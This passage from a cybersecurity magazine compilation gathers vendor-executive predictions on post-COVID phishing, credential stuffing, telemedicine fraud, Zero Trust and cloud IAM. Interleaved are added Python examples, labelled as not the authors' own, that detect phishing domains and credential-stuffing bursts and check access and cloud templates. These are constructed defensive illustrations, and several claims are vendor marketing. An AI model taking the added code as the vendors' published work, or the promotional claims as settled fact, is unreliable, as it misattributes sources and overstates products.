non-availability of a reliable cure or vaccine is the primary reason for the panic created in people's minds.

Thus, when they encounter an email message seemingly originating from an influential source like the

US Center for Disease Control and Prevention, WHO, or other prominent health agencies, people rarely

check their authenticity. Recently, there has been a surge of phishing emails sent by these malicious

actors impersonating healthcare professionals and organizations, making healthcare one of the most

vulnerable sectors in coronavirus times.

Offer for Loans and Grants - The Most Effective COVID-19 Phishing Attack

The pandemic has thrown the world economy in disarray. It has affected almost every segment of society.

Under these circumstances, people eagerly look forward to Governmental aid such as EMI moratoriums,

loans, and other giveaways. Malicious actors have been taking advantage of these situations and are

trying to lure people to fictitious websites, where the unsuspecting users end up providing vital information

leading to severe data breaches. These attacks are seen in the form of phishing emails, ransomware, or

banking malware attacks.



Donation Solicitations - The Most Dangerous COVID-19 Phishing Scam

Global pandemics like COVID-19 bring out the humanitarian side of people in a substantial way.

Generally, people donate generously towards their respective National Disaster Relief Funds, and

research funds set up by their governments. There have been numerous incidents of cybercriminals

taking advantage of such philanthropic activities. One of the most notorious modus operandi is to design

fundraising pages that not only mislead users into donating money but also steal sensitive personal

information. Using such information, like names, email addresses, phone numbers, credit card details,

and internet banking usernames and passwords, these malicious actors accept money using the names

of disaster relief funds.

COVID-19 Vaccine and Cure Scam - The Most Ingenious COVID-19 Phishing Attack

While researchers are struggling to find an antidote for the coronavirus, numerous fake websites

advertising medicines and vaccines have sprung up on the internet. More than 20,000 new COVID-19-

related domains have been registered in the past few weeks. These websites also claim to sell COVID-

19 personal protective kits like face masks, sanitizers, hand gloves, medical combinations like

Hydroxychloroquine, Remdesivir, and so on. Such fraudulent websites ask for the full payment in

advance and unsuspecting people end up parting with their money only to discover that they have been

a victim of cybercrime. Amazon itself reported over a million fake products in this category over the past

couple of months.

Detective, Preventive and Protective Measures Individuals & Enterprises Can Adopt

Cybercriminals play on the psychology of the victim by pushing in email messages with COVID-19 related

information that come along with a malicious attachment or infectious URL. Knowing some of these

threats could be the best defense in thwarting such attempts:

• Reliance on Trusted Sources: Rely on authentic or official websites to get reliable information and

updates about the coronavirus. Be scrupulous in clicking on the links provided on articles and

blogs that share information on COVID-19.

• Refrain from The Temptation To Click/Download: Sometimes, ignoring unsolicited emails is the

best phishing prevention method. Downloading or opening malicious attachments or clicking on

an infectious URL allows malicious actors to gain access to network systems.

• Knowing the Phishing Techniques: The latest tactic deployed by malicious actors is to set up live

tracker websites from which people can purportedly get live coronavirus updates. Though the

websites appear legitimate, they are scamming attempts that end up with the user compromising

their confidential information.

• Phishing Protection Solutions: The best way to deal with phishing threats is to install a trusted

anti-phishing solution to thwart any attempt made by adversaries.



• Phishing Awareness: Phishing awareness training plays an integral part in safeguarding information assets. Enterprises should educate and train their employees, customers, and third-party vendors on types of phishing, anti-phishing techniques, phishing prevention best practices, etc.
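As an added illustration of the detective measures above (not code from the article or from DuoCircle), the following triage checks an inbound message's sender and link domains for the three signals the article describes: lookalikes of the WHO and CDC domains, COVID-themed names, and very recent registration. The sample messages, their .test domains and the registration dates (standing in for a WHOIS lookup) are constructed.

```python
import re
from datetime import date

# Brands the article names as impersonated in pandemic lures, with their
# genuine registrable domains.
IMPERSONATED_BRANDS = {"who": "who.int", "cdc": "cdc.gov"}
COVID_KEYWORDS = ("covid", "corona", "vaccine", "pandemic", "relief", "tracker")
NEW_DOMAIN_DAYS = 60  # registrations younger than this are treated as a signal

# Constructed sample messages (hypothetical). "registered" is the registration
# date of the message's domain, as a WHOIS lookup would return it; .test is a
# reserved TLD, so none of these domains resolve.
SAMPLE_MESSAGES = [
    {"from": "alerts@who.int",
     "url": "https://www.who.int/emergencies", "registered": date(1998, 1, 1)},
    {"from": "who-update@who-int-alert.test",
     "url": "http://who-int-alert.test/covid19", "registered": date(2020, 3, 2)},
    {"from": "grants@covid19-relief-fund.test",
     "url": "https://covid19-relief-fund.test/apply", "registered": date(2020, 3, 20)},
    {"from": "newsletter@example.test",
     "url": "https://example.test/blog", "registered": date(2005, 6, 1)},
]


def host_of(url: str) -> str:
    """Host part of an http(s) URL, without scheme, path or port."""
    return re.sub(r"^https?://", "", url).split("/")[0].split(":")[0].lower()


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Enough for the constructed sample; real
    code would consult the public-suffix list."""
    return ".".join(host.lower().split(".")[-2:])


def domain_reasons(host: str, registered: date, today: date) -> set:
    """Signals raised by one domain: brand lookalike, COVID theme, new registration."""
    reasons = set()
    reg = registrable_domain(host)
    labels = re.split(r"[.-]", reg)
    for brand, real in IMPERSONATED_BRANDS.items():
        # The brand appears as a label (who-int-alert.test) but the domain is
        # not the genuine one (who.int).
        if brand in labels and reg != real:
            reasons.add("brand-lookalike")
    if any(keyword in reg for keyword in COVID_KEYWORDS):
        reasons.add("covid-keyword")
    if (today - registered).days <= NEW_DOMAIN_DAYS:
        reasons.add("newly-registered")
    return reasons


def triage_message(msg: dict, today: date = date(2020, 4, 1)):
    """Return ("suspicious" | "ok", sorted reasons) for one message."""
    sender_domain = msg["from"].rsplit("@", 1)[-1].lower()
    reasons = set()
    for host in {sender_domain, host_of(msg["url"])}:
        reasons |= domain_reasons(host, msg["registered"], today)
    verdict = "suspicious" if len(reasons) >= 2 else "ok"
    return verdict, sorted(reasons)


def triage_all(messages=SAMPLE_MESSAGES) -> dict:
    return {m["from"]: triage_message(m) for m in messages}


if __name__ == "__main__":
    for sender, (verdict, reasons) in triage_all().items():
        print(f"{verdict:10} {sender:40} {', '.join(reasons)}")
```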

Post COVID-19 – What Does the Future Look Like?

With lockdown restrictions in place almost everywhere, a significant proportion of people already have a presence online, from shopping, ordering food and essential items to working from home. The shift to a virtual workplace has become more pronounced than before, as a majority of online businesses already allow their employees to WFH, and they are likely to continue doing so post COVID-19, considering the numerous benefits and the overall increase in employee productivity.

As a downside, though, cyber adversaries have seized the opportunity to target as many people as

possible. Hence, one can expect a surge in phishing attacks and scams in times to come. Therefore, one

should exercise extreme caution and neutralize the vulnerabilities to mitigate the information risks

encountered because of COVID-19. Deploying an effective anti-phishing solution is the need of the hour

to tackle these attacks better, and has never been so significant.

About the Author

Brad Slavin, CEO of DuoCircle LLC. Brad Slavin is a security industry veteran and the General Manager at DuoCircle LLC, a cloud email security firm. Before joining DuoCircle, Brad began his career in network security by founding a regional ISP in California and was the cofounder of the wireless wardriving and security software Netstumber.com, which was the recipient of the "Editor's Choice" - Laptop Magazine & Ziff-Davis i3 Award for innovation.

Brad can be reached online at https://www.linkedin.com/in/bradslavin/ and our company website https://www.phishprotecion.com



Post COVID-19: Password Extinction Accelerated;

Telemedicine Spurs Fraud

By Robert Prigge, CEO of Jumio

Passwords will become extinct much faster than predicted.

As the COVID-19 pandemic pushed more of us to self-isolate, Zoom became the go-to teleconferencing

platform. In fact, Zoom went from 10 million daily meetings in December to 300 million today.

Unfortunately, this surge in popularity came with a price tag — a lack of data privacy. Now, there are over

500,000+ stolen Zoom logins floating around the dark web for just .002 cents each. And this is just

opening the door for account takeover (ATO) attacks via credential stuffing — a type of cyberattack where

automated bots use those stolen account credentials to gain unauthorized access to user accounts. And

Zoom is not alone. We’ve also seen a rash of account takeover attempts aimed at users of Microsoft’s

proprietary Remote Desktop Protocol (RDP), striking millions per week.

With data collected and sold on the dark web containing usernames and passwords from past breaches,

and internet users often recycling the same login credentials across multiple platforms, cybercriminals

have all of the tools they need to impersonate a user’s identity online. This means that if your online

account is only protected by a username and password, then you’re likely going to be an ATO target. As

a result, password-based authentication, multi-factor authentication (2FA) and knowledge-based

authentication (KBA) will be a thing of the past much sooner than previously anticipated, and businesses

will look to more sophisticated and secure login options for current and prospective users.
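Credential stuffing of the kind described above leaves a recognisable trace in authentication logs: one source address trying many different usernames within a short window, with the occasional success marking an account that has just been taken over. The following detector is an added example, not code from the article or from Jumio; the log format, the addresses (documentation ranges) and the usernames are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication log (not from any real system). 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = """\
2020-04-10T09:00:01Z ip=203.0.113.5 user=alice result=fail
2020-04-10T09:00:02Z ip=203.0.113.5 user=bob result=fail
2020-04-10T09:00:03Z ip=203.0.113.5 user=carol result=fail
2020-04-10T09:00:04Z ip=203.0.113.5 user=dave result=fail
2020-04-10T09:00:05Z ip=203.0.113.5 user=eve result=success
2020-04-10T09:00:06Z ip=203.0.113.5 user=frank result=fail
2020-04-10T09:01:00Z ip=198.51.100.9 user=alice result=fail
2020-04-10T09:01:05Z ip=198.51.100.9 user=alice result=fail
2020-04-10T09:01:10Z ip=198.51.100.9 user=alice result=success
"""


def parse_line(line: str) -> dict:
    """Parse one 'timestamp key=value ...' line into a dict with a datetime."""
    ts, rest = line.split(" ", 1)
    event = dict(kv.split("=", 1) for kv in rest.split())
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect_credential_stuffing(log_text: str = SAMPLE_LOG,
                               window: timedelta = timedelta(seconds=60),
                               min_users: int = 5) -> dict:
    """Flag source addresses that attempt at least `min_users` distinct
    usernames inside any sliding `window`. A single user failing a few times
    (a mistyped password) never trips this, because the count is of distinct
    usernames, not of failures."""
    events = [parse_line(line) for line in log_text.splitlines() if line.strip()]
    by_ip = defaultdict(list)
    for event in events:
        by_ip[event["ip"]].append(event)

    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end, event in enumerate(evs):
            # Advance the window start until it is within `window` of `event`.
            while event["ts"] - evs[start]["ts"] > window:
                start += 1
            span = evs[start:end + 1]
            users = {e["user"] for e in span}
            if len(users) < min_users:
                continue
            hit = alerts.setdefault(ip, {"distinct_users": 0, "succeeded": set()})
            hit["distinct_users"] = max(hit["distinct_users"], len(users))
            # Successes inside a stuffing burst are the accounts to reset first.
            hit["succeeded"] |= {e["user"] for e in span if e["result"] == "success"}

    return {ip: {"distinct_users": h["distinct_users"],
                 "succeeded": sorted(h["succeeded"])}
            for ip, h in alerts.items()}


if __name__ == "__main__":
    for ip, hit in detect_credential_stuffing().items():
        print(f"{ip}: {hit['distinct_users']} usernames tried, "
              f"successes: {hit['succeeded'] or 'none'}")
```

The accounts listed under `succeeded` are the ones to lock and re-verify; the same distinct-username count is also a natural trigger for stepping up to a second factor on that source address.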



Telemedicine will open up new threat vectors for fraud.

Given the health concerns involved with physically visiting a doctor or hospital during COVID-19, patients

have been urged to stay home unless symptoms are considered severe. Because of this, telemedicine

has been the most viable resource for those seeking medical counsel during this time. Unfortunately

there have also been over 3,000 healthcare-related breaches that have impacted more than 500 million

medical records in the past decade, a trend that has been escalating year-over-year. Due to the high

amount of personal information, medical records command a high value on the dark web and can be

listed for up to $1,000 each, 10 times more than the average credit card data breach record.

Cybercriminals can then easily obtain this information and impersonate legitimate patients.

This stolen information can also be used to obtain free medical or dental care. Because of this, CIOs will

scramble to ensure procedures are in place so that doctors know their patients are who they say they are

—and this is the domain of the emerging field of Know Your Patient (KYP). This means healthcare

provider organizations need to adopt identity safeguards similar to the Know Your Customer (KYC)

regulations adopted by the financial service industry.

About the Author

Robert Prigge is responsible for all aspects of Jumio’s business and

strategy. Specializing in security and enterprise business, he held C-level

or senior management positions at Infrascale, Secure Computing,

McAfee, Quest Software, Sterling Commerce and IBM. Robert can be

reached online via LinkedIn, on Twitter @rprigge and at Jumio’s website,

www.jumio.com.



The Future Of Security – Predictions Post COVID-19

By Mike Riemer, Pulse Secure, Global Chief Security Architect

The Future of Work post COVID-19 - Larger Remote Workforce with Cybersecurity Built into the

Culture

“A recent Gartner survey of over 300 CFOs found that 74% of respondents say they expect to move previously on-site employees to remote post-COVID-19. As such, a large remote workforce is forcing companies to re-evaluate how to evolve their corporate culture and invest in capital. Embedding a long-term cybersecurity strategy as part of this evolution to keep workers safe will be critical.

Ultimately, an effective security culture mitigates the risk of a breach as a result of credential theft,

phishing and business email compromise (BEC) – and working with employees to protect their privacy

addresses a growing issue for many people, 28% of whom have had their identity hacked or stolen. That

number increases to 35% when looking at the entire U.S.

However, as businesses are quick to ditch their office spaces, they will need to allow employees to have

secure remote access to corporate systems as well as implement Zero Trust. Zero Trust is an approach

based on the concept of continuous verification and authorization. It ensures that only authenticated

users with compliant devices, whether corporate, personal or public, can connect to authorized

applications over any network, whether on-premises or in the cloud. This will help remote workers to

engender more confidence that their business and personal data is secure. “

Zero Trust Must be Part of the Future of Work During and Post COVID-19

“The need for Zero Trust security has never been greater, especially due to increased targeted attacks,

rapid work from home mandates, and mounting privacy compliance obligations due to COVID-19. As

such, enterprise adoption of the Zero Trust security model is growing as mobility and hybrid IT models



have placed most workloads beyond the shelter of corporate networks and traditional perimeter defense.

This creates significant user access and data concerns.

The 2020 Zero Trust Progress Report by Pulse Secure revealed that nearly a third of cybersecurity

professionals have expressed value in applying Zero Trust to address hybrid IT security issues. This

report, which surveyed more than 400 cyber security decision makers, found that 72% of organizations

plan to assess or implement Zero Trust capabilities in some capacity in 2020 to mitigate growing cyber

risk, while nearly half (47%) of cyber security professionals lack confidence applying a Zero Trust model

to their Secure Access architecture.

With its principle of user, device and infrastructure verification before granting conditional access based

on least privilege, Zero Trust holds the promise of vastly enhanced usability, data protection and

governance and must be part of any security architecture as we navigate the current COVID-19 business

landscape.”

Telemedicine and Remote Field Offices are Changing the Needs of Healthcare Professionals

“Healthcare is going the way of other industries with employees being asked to work remotely and post

COVID-19, we believe the use of telemedicine and remote field offices will be the new normal in

healthcare.

As such, IT teams must provide healthcare workers with mobile devices that are protected, even on

expanded Wi-Fi networks or cellular networks as employees are often working outside secure networks,

opening their mobile devices to additional threats.

Increasing remote capacity on network protections such as VPNs, extends security to those workers in

the field, ensuring that both patient information as well as other personal information stored on those

devices is safe. By deploying Zero Trust policies, info security teams can also implement fine-tuned user

access management to ensure that network capacity is maximized and that workers only have access to

the information that’s absolutely necessary.”
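The access decision described above (user, device and context verified on every request, then least-privilege access to one application) can be made concrete in code. The following is an added example written for this edition, not Pulse Secure's code; the users, devices, applications, role names and the patch-age compliance thresholds are constructed for illustration.

```python
"""Zero Trust access decision: verify the user, the device and the request
context before granting least-privilege access to a single application.

Added example; not Pulse Secure's code.  All inventory data and the
compliance thresholds are constructed assumptions.
"""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List


@dataclass(frozen=True)
class User:
    name: str
    authenticated: bool          # primary credential verified
    mfa_passed: bool             # second factor verified in this session
    roles: FrozenSet[str]


@dataclass(frozen=True)
class Device:
    device_id: str
    disk_encrypted: bool
    os_patch_age_days: int       # days since the last OS security patch
    edr_running: bool            # endpoint protection agent present


@dataclass(frozen=True)
class Application:
    name: str
    allowed_roles: FrozenSet[str]
    max_patch_age_days: int = 30  # assumed per-application compliance threshold


@dataclass
class Decision:
    allow: bool
    reasons: List[str] = field(default_factory=list)   # why access was refused


def compliance_failures(device: Device, app: Application) -> List[str]:
    """Device posture checks; an empty list means the device is compliant."""
    failures = []
    if not device.disk_encrypted:
        failures.append("disk not encrypted")
    if not device.edr_running:
        failures.append("endpoint protection not running")
    if device.os_patch_age_days > app.max_patch_age_days:
        failures.append(f"OS patch age {device.os_patch_age_days}d exceeds "
                        f"{app.max_patch_age_days}d")
    return failures


def authorize(user: User, device: Device, app: Application) -> Decision:
    """Evaluate every request from scratch (continuous verification): nothing
    is inherited from the network the request arrived on."""
    reasons = []
    if not user.authenticated:
        reasons.append("user not authenticated")
    if not user.mfa_passed:
        reasons.append("MFA not satisfied")
    reasons.extend(compliance_failures(device, app))
    # least privilege: the user must hold a role this application explicitly allows
    if not (user.roles & app.allowed_roles):
        reasons.append(f"no role grants access to {app.name}")
    return Decision(allow=not reasons, reasons=reasons)


# Constructed sample inventory (hypothetical users, devices and applications)
APPS = {
    "ehr": Application("ehr", frozenset({"clinician"}), max_patch_age_days=14),
    "payroll": Application("payroll", frozenset({"finance"})),
}


def sample_decisions() -> Dict[str, Decision]:
    nurse = User("nurse01", authenticated=True, mfa_passed=True,
                 roles=frozenset({"clinician"}))
    contractor = User("ctr07", authenticated=True, mfa_passed=False,
                      roles=frozenset({"finance"}))
    managed = Device("lt-100", disk_encrypted=True, os_patch_age_days=7, edr_running=True)
    stale = Device("byod-5", disk_encrypted=True, os_patch_age_days=45, edr_running=True)
    return {
        "nurse_managed_ehr": authorize(nurse, managed, APPS["ehr"]),
        "nurse_stale_ehr": authorize(nurse, stale, APPS["ehr"]),
        "nurse_managed_payroll": authorize(nurse, managed, APPS["payroll"]),
        "contractor_managed_payroll": authorize(contractor, managed, APPS["payroll"]),
    }


if __name__ == "__main__":
    for label, decision in sample_decisions().items():
        print(label, "ALLOW" if decision.allow else "DENY", decision.reasons)
```

Every refusal carries its reasons, which is what lets the help desk tell a clinician on a stale BYOD device to patch rather than re-enter credentials; the patch-age threshold is tighter for the patient-record application than the default, showing how the policy can be per-application rather than per-network.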

About the Author

Mike Riemer is the Global Chief Security Architect for Pulse Secure, where he has worked for the last six years. He has over 37 years of IT and IT Security experience and is a Certified Instructor on Firewall/Virtual Private Networking, Intrusion Detection/Prevention, SSL/VPN and Network Access Control disciplines. He previously spent 25 years with the U.S. Air Force working in Cyber Security and Intelligence.


Post COVID-19 Cybersecurity and Future-of-Work Predictions

By DivvyCloud by Rapid7, Chris DeRamus, VP of Technology, Cloud Security Practice

Remote work is here to stay:

“Some organizations (including DivvyCloud) preferred coming into the office for work prior to the pandemic because we enjoyed the sense of community. But the current situation has changed our outlook on remote work, and the same is true for many organizations around the world. Many companies are quickly realizing their employees are just as productive working from home through cloud apps and services as they are in the office space. In fact, in many cases employees are even more productive because they don’t waste time commuting. As such, we should expect plenty of organizations to transition to more frequent (or even permanent) remote work models once stay-at-home orders have been lifted. Organizations may even reduce or eliminate office spaces to cut back on overhead costs, especially those looking to climb out of economic hardship caused by the pandemic.”

To support remote work, organizations will need to prioritize cloud spend:

“Organizations have been spending more on cloud infrastructure to support their remote workforces. Increased demand spurred AWS’ sales to surpass $10 billion this past quarter and Azure is running out of capacity in some regions. As a result, organizations will need to “tighten the operational belt” from a budget perspective and ensure that the proper security and governance controls, virtual desktop infrastructure (VDIs), and other key instances are implemented.

For DivvyCloud and plenty of other organizations, real-time communications platforms like Slack and Teams have been invaluable for navigating the work-from-home experience, and we can expect to see a heightened demand for these tools even once this pandemic subsides. Additionally, organizations will need to focus on identity and access management in their cloud infrastructure. This will ensure employees are able to securely access the tools and resources they need to do their jobs while thwarting fraudulent unauthorized attempts from bad actors.”

Choosing between security and innovation in the cloud will continue to be a common, avoidable pitfall:

“Nearly 50% of developers and engineers bypass cloud security and compliance policies and just 58% of organizations have clear guidelines for developers building applications in the public cloud. Developers work hard and fast to deploy new features and services to meet market demands, but without the proper guardrails in place, this can lead to misconfigured cloud instances, severe security flaws, and more.

In fact, in early April, it became publicly known that Zoom’s engineers bypassed common security features, such as not requiring users to add unique file names before saving their videos. While this allowed Zoom to support its exponential jump in demand (from 10 million daily users in December 2019 to over 200 million in March 2020), it also resulted in errors such as thousands of users’ videos being made publicly accessible on unprotected Amazon buckets. This news added to a string of other privacy concerns around Zoom. DevOps and security must be completely in sync to avoid similar pitfalls.”

Engineers will begin to tackle cloud security flaws earlier in the build pipeline:

“Security and compliance practices have been mainly reactive, with teams scrambling to catch security/compliance flaws after cloud resources are built. But as anyone in that position can attest, there’s no putting the genie back in the lamp. Instead, engineers will need to focus on how “to-be-built” infrastructure or changes will affect the security and compliance of their cloud footprint while they are still in the continuous integration/continuous deployment pipeline.

For example, Zoom’s CEO pledged to shift the company’s engineering resources to proactively address issues with measures such as a third-party review of changes before they’re made, white box pen tests to further identify and address issues, and upgrading Zoom’s encryption scheme to AES 256-bit GCM encryption. Other organizations will leverage capabilities such as Infrastructure as Code security to build a virtual data model of what would have been built and either affirm or deny the compliance of proposed changes while also warning engineers of potential violations, thus giving them the opportunity to learn from the experience and incorporate learnings into future projects.”

IAM is (and will continue to be) the primary perimeter in cloud security:

“All users, apps, services, and systems in the cloud have an identity, and as organizations shifted to remote styles of work, they quickly learned that these relationships are complex. Understanding the full picture of access in the cloud and working toward least privileged access are difficult, but necessary endeavors to ensure security in the cloud. In the last couple months, plenty of enterprise security professionals have realized that cloud identity and access management (IAM) is an area where they are vulnerable because they lack insight into the complex problem.

The repercussions of poor IAM governance are substantial and sometimes unpredictable. For example, last year a former AWS employee accessed over 100 million Capital One customers’ records after she bypassed a misconfigured web application firewall, then used privilege escalation to access the data.

To protect the identity perimeter at scale, organizations need an automated monitoring and remediation solution for access management, role management, identity authentication and compliance auditing – all of which help enterprise security teams stay ahead in this complex landscape. Even once this pandemic subsides, we will continue to see a great emphasis placed on cloud IAM, especially as organizations continue to encourage remote work.”
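The “affirm or deny” step for proposed changes, and the least-privilege IAM review called for in the last prediction, both amount to running policy rules over a description of what is about to be built, before it exists. The following added example (not DivvyCloud's or Rapid7's code) does that over a simplified CloudFormation-style template held as a Python dict; the template, its resource names and the rule identifiers are constructed for illustration. It catches the two failure modes named in the text: a bucket that would be publicly readable, and a role whose inline policy allows every action on every resource.

```python
"""Pre-deployment compliance check over a proposed infrastructure template.

Added example; not DivvyCloud's or Rapid7's code.  The template is a
simplified CloudFormation-style dict constructed here; rule names and the
resource types handled are assumptions for illustration.
"""
from dataclasses import dataclass
from typing import Any, Dict, List

PUBLIC_ACLS = {"PublicRead", "PublicReadWrite"}
PUBLIC_ACCESS_FLAGS = ("BlockPublicAcls", "BlockPublicPolicy",
                       "IgnorePublicAcls", "RestrictPublicBuckets")


@dataclass(frozen=True)
class Finding:
    resource: str
    rule: str
    detail: str


def _as_list(value: Any) -> List[Any]:
    """IAM lets Action/Resource be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def check_bucket(name: str, props: Dict[str, Any]) -> List[Finding]:
    """A bucket passes only with no public canned ACL and all four
    public-access-block flags enabled."""
    findings = []
    if props.get("AccessControl") in PUBLIC_ACLS:
        findings.append(Finding(name, "S3_PUBLIC_ACL",
                                f"AccessControl={props['AccessControl']}"))
    block = props.get("PublicAccessBlockConfiguration", {})
    missing = [f for f in PUBLIC_ACCESS_FLAGS if not block.get(f, False)]
    if missing:
        findings.append(Finding(name, "S3_PUBLIC_ACCESS_BLOCK",
                                "not enforced: " + ", ".join(missing)))
    return findings


def check_policy_document(name: str, doc: Dict[str, Any]) -> List[Finding]:
    """Flag Allow statements that grant every action, or a service-wide
    wildcard action on every resource (the opposite of least privilege)."""
    findings = []
    for idx, stmt in enumerate(_as_list(doc.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        if "*" in actions:
            findings.append(Finding(name, "IAM_WILDCARD_ACTION",
                                    f"statement {idx} allows Action '*'"))
        if "*" in resources and any(a == "*" or a.endswith(":*") for a in actions):
            findings.append(Finding(name, "IAM_WILDCARD_RESOURCE",
                                    f"statement {idx} allows {actions} on Resource '*'"))
    return findings


def check_template(template: Dict[str, Any]) -> List[Finding]:
    """Walk every resource in the proposed template and collect findings."""
    findings = []
    for name, res in template.get("Resources", {}).items():
        rtype, props = res.get("Type"), res.get("Properties", {})
        if rtype == "AWS::S3::Bucket":
            findings.extend(check_bucket(name, props))
        elif rtype == "AWS::IAM::Policy":
            findings.extend(check_policy_document(name, props.get("PolicyDocument", {})))
        elif rtype in ("AWS::IAM::Role", "AWS::IAM::User", "AWS::IAM::Group"):
            for inline in props.get("Policies", []):   # inline policies attached to the principal
                findings.extend(check_policy_document(
                    f"{name}/{inline.get('PolicyName', '?')}", inline.get("PolicyDocument", {})))
    return findings


def is_compliant(template: Dict[str, Any]) -> bool:
    """The affirm/deny gate: True only when no rule fired."""
    return not check_template(template)


# Constructed proposed change: one bad bucket, one good bucket, one over-privileged role
PROPOSED_TEMPLATE = {"Resources": {
    "RecordingsBucket": {"Type": "AWS::S3::Bucket",
                         "Properties": {"AccessControl": "PublicRead"}},
    "AuditBucket": {"Type": "AWS::S3::Bucket", "Properties": {
        "PublicAccessBlockConfiguration": {
            "BlockPublicAcls": True, "BlockPublicPolicy": True,
            "IgnorePublicAcls": True, "RestrictPublicBuckets": True}}},
    "BuildRole": {"Type": "AWS::IAM::Role", "Properties": {"Policies": [
        {"PolicyName": "build", "PolicyDocument": {"Statement": [
            {"Effect": "Allow", "Action": "*", "Resource": "*"}]}}]}},
}}

if __name__ == "__main__":
    for f in check_template(PROPOSED_TEMPLATE):
        print(f"{f.resource}: {f.rule} ({f.detail})")
    print("compliant:", is_compliant(PROPOSED_TEMPLATE))
```

Run as a CI step, the findings go back to the engineer with the resource name and the rule that fired, while `is_compliant` decides whether the pipeline proceeds; the same rule functions can be pointed at a live account inventory later, which is the monitoring half of the approach described above.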

About the Author

Chris is the VP of Technology, Cloud Security Practice at DivvyCloud by Rapid7. He is a technical pioneer whose passion is finding innovative and elegant new ways to deliver security, compliance and governance to customers running at scale in hybrid cloud environments. He remains deeply technical, writing code and diving into the latest technologies and services being deployed by partners like Amazon, Microsoft, Google, VMware, and OpenStack.

Before co-founding DivvyCloud, Chris was the Online Operations Manager at Electronic Arts for the Mythic Studio where he helped design, build and operate large scale cloud infrastructure spanning public and private clouds to run Electronic Arts’ largest online games (including Warhammer Online: Wrath of Heroes and Warhammer Online: Age of Reckoning). He started his career as a Network & System Administrator at the U.S. Department of Energy where he was mandated with a broad array of technical responsibilities including security and compliance.

Chris earned his Bachelor of Business Administration in Computer Information Systems from James Madison University.


Building A Telework Health Scorecard To Meet Surge Requirements And Long-Term Resiliency

By Stan Lowe, Global Chief Information Security Officer, Zscaler

Over the past months, the U.S. Federal government has deployed solutions to keep employees productive and secure from any location, including at home. The initial rapid response typically included increasing capacity, deploying new remote access options, and enhancing security measures.

As CIOs and CISOs move forward from the initial crisis mode, they now need to take a harder look at the systems in place – what is working and what is needed. But to get the right answers, we have to ask the right questions.

There are different sets of considerations and evaluation questions to ask in initial crisis phases vs. in steady-state environments. IT leaders can build customized telework health scorecards for these two phases to provide a comprehensive view and then prioritize the next steps.

Initial Crisis Telework Health Evaluation Criteria

1. What do we need to do? Prioritize the most important tasks. Then, consider the resources users will need and what can be postponed or cut altogether.

2. Who needs access, when? Consider the access policies needed to align access with mission priorities. Do all employees need to have always-on connectivity? What work requires only occasional connectivity? To ensure comprehensive, secure access, agencies may initially need to take a “tiered” connectivity approach.

3. How can employees connect? Some employees may have had government-issued laptops and devices prior to the crisis, but do all employees now need laptops? Prioritize needs. Then, evaluate risks and develop BYOD policies and education.

4. Can we stagger work hours? It may not be possible to accommodate an almost entirely remote workforce within the typical 9-5 hours. Some agencies can adjust work hours, moving mission critical work to the “graveyard-shift” hours to ensure seamless connectivity to perform critical duties.

5. How do we improve performance/connection speed? As the network perimeter expands, many agencies are moving to the cloud through a secure access service edge (SASE) model. Direct access via internet breakouts provides fast, secure access for all users.

What’s Next? Evaluating and Evolving Telework Health for the Long Haul

Once mission critical teams are operational in remote environments and the organization has moved past that initial crisis response, the next step is to take the lessons learned and evaluate how to continue down the modernization path. What will drive simplicity, reduce costs, and create scalability for any future COOP scenarios?

This is not a one-and-done process but should be built into ongoing IT operations and planning.

Here are six design architecture questions to help frame telework health – with the goal of driving digital transformation and improving security, access, and support for remote employees:

1. Do we provide a seamless user experience with direct access to internal and external applications?

Agencies need to adjust security from traditional, legacy appliance-based tools, such as VPNs, to a solution that secures traffic no matter where the user or target application resides. Zero trust connections allow users to directly access applications in any location. This eliminates the hair-pinning caused by backhauling traffic through a VPN, reduces traffic, and reduces latency – ultimately, improving the user experience. Zero trust also never puts users on the network, reducing the attack surface.

2. Do we have context-aware access?

Users should only be given access to resources and applications necessary for their job functions. Agencies should develop clear access policies and rules enforced through a zero trust security model, where only authorized users will be granted access to authorized applications. This can further limit east-west traffic on the network so that users will not reach applications they were not intended to reach.

Context-aware access also delivers benefits beyond work-from-home security, such as mergers and acquisitions, cloud migration, third-party access, and more. Zero trust network access solutions address all of these scenarios with simple policies that are user-centric, rather than network-centric.

3. Are we enabling flexible deployment for instant and seamless expansion?

A cloud-based zero trust service can provide a scalable environment without placing a significant burden on the IT team. Agencies can start with an initial use case and transition from broad policies to more granular and specific policies as they go. And many Federal agencies already have elements of zero trust in their infrastructure, such as endpoint management, Continuous Diagnostics and Mitigation, software-defined networking, micro-segmentation, and cloud monitoring. Once zero trust access is fully operational, decommission VPN access for the group, then iterate as necessary.

4. How are we providing comprehensive visibility and troubleshooting that enables rapid user-issue resolution?

In a legacy environment, you can’t protect what you don’t know is there. A disadvantage of legacy solutions is that data is often distributed across the environment, and agencies often use complex tools with multiple interfaces, methodologies, and terminologies. This creates a higher likelihood that bad actors could be hiding in the background, hoping to be overlooked. Zero trust provides IT administrators with a single pane of glass view to manage, administer, and log users in one place. Administrators will have full visibility and control into the distributed environment.

5. How do we reduce security and remote access infrastructure maintenance requirements?

Appliance-based remote access solutions constantly need updates on firmware, software, security, and policies to keep up to date with technology and advancing security risks. A cloud Software-as-a-Service model greatly reduces management and upkeep. This can free up time for agencies to focus on more critical mission needs along with improving their policies, instead of patching security holes.

6. What will ensure scalability for future COOP scenarios?

Legacy remote access solutions, such as VPNs, may require adjustments to bandwidth, throughput, or additional technology adoption to scale to meet operational needs. Many agencies’ initial reactions to the current crisis have been to grow capacity by implementing new infrastructure or adding new appliances. But a cloud-native capability is the only solution that can easily scale up and down as needed when future COOP scenarios arise.

Cloud-delivered zero trust SASE models will transition security from network-centric controls and remote network connectivity to user-centric and application-centric security, designed to support highly distributed teams working beyond the traditional network perimeter.

One thing we’ve learned from these past months is that every agency needs a systematic process to evaluate telework health. These questions and review processes will create a stronger, more resilient government that can keep employees safe, productive, and focused on delivering citizen services.



About the Author

